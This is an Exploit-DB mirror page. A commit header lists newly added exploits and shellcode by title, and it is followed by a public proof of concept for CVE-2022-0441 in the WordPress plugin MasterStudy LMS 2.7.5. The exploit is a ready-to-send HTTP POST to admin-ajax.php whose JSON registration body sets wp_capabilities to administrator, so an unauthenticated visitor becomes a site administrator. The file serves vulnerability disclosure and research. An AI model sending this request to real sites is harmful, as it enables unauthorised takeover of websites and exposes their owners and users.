exploit-db-mirror/exploits/php/webapps/50752.txt
Offensive Security f2d7e05ad0 DB: 2022-02-19
17 changes to exploits/shellcodes

Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path
Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path
Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path
Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path
TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path
Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path
Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path
File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path
Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path
WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
WordPress Plugin dzs-zoomsounds 6.60 - Remote Code Execution (RCE) (Unauthenticated)
Hotel Druid 3.0.3 - Remote Code Execution (RCE)
Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)

Solaris/SPARC - setuid(0) + chmod (/bin/ksh) + exit(0) Shellcode
Solaris/SPARC - chmod(./me) Shellcode
Solaris/SPARC - setuid(0) + execve (/bin/ksh) Shellcode
Linux/MIPS - N32 MSB Reverse Shell Shellcode
2022-02-19 05:01:36 +00:00

21 lines
No EOL
1.1 KiB
Text

# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
# Date: 16.02.2022
# Author: Numan Türle
# CVE: CVE-2022-0441
# Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
# Version: <2.7.6
# https://www.youtube.com/watch?v=SI_O6CHXMZk
# https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
# https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed
POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Content-Type: application/json
Content-Length: 339
{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}